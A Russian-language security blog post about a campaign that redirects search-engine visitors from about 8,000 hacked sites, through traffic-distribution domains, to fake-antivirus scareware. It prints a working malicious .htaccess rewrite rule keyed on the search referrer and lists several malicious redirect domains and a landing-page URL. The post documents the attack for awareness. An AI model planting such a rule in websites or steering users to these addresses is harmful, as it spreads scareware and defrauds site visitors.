Атака лжеантивирусов

Сегодня замечено массовое перенаправление со взломанных сайтов на сайты лжеантивирусов (Fake AntiVirus). По подсчетам компании Sucuri, зараженными оказалось около 8 тысяч сайтов. Следует отметить, что редирект происходит только при переходе с поисковых систем.  Набрав адрес сайта вручную, перенаправления не произойдёт.  Этого можно добиться файлом .htaccess, измененным определенным образом.

Вот примерное содержание такого файла .htaccess:

RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo).(.*)
RewriteRule ^(.*)$ http://moisupas.ru/blackmuscats?5 [R=301,L]

Статистика по редиректам:

 1297 redirections http://my-supas.ru/blackmuscats?5
 1156 redirections http://moisupas.ru/blackmuscats?5
 1077 redirections http://moi-supas.ru/blackmuscats?5
 1001 redirections http://mysupas.ru/blackmuscats?5
 975 redirections http://moi-supa.ru/blackmuscats?5
 391 redirections http://my-supa.ru/blackmuscats?5
 329 redirections http://supa-web.ru/blackmuscats?5
 263 redirections http://my-supas.ru/blackmuscats?5
 244 redirections http://moisupas.ru/blackmuscats?5
 223 redirections http://moi-supas.ru/blackmuscats?5
 206 redirections http://mysupas.ru/blackmuscats?5
 192 redirections http://moi-supa.ru/blackmuscats?5
 80 redirections http://my-supa.ru/blackmuscats?5
 65 redirections http://supa-web.ru/blackmuscats?5

и так далее…

Что же происходит дальше? Эти сайты являются системами распределения трафиком (TDS). Далее, часть нужных пользователей они перенаправляют на сайт с лжеантивирусом.

Пример такого сайта:

http://www1.antivirusworrydanger.pl/370l3591/al/1fedfba29dd0193d/pr2/0/

Нажав на кнопку Clean Computer предлагается загрузить файл, который и является лжеантивирусом. Последующая схема давно известна. Этот лжеантивирус будет назойливо сообщать, что найдены опасные вирусы и для их удаления нужно приобрести лицензию.

В рубрике: Malware.

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *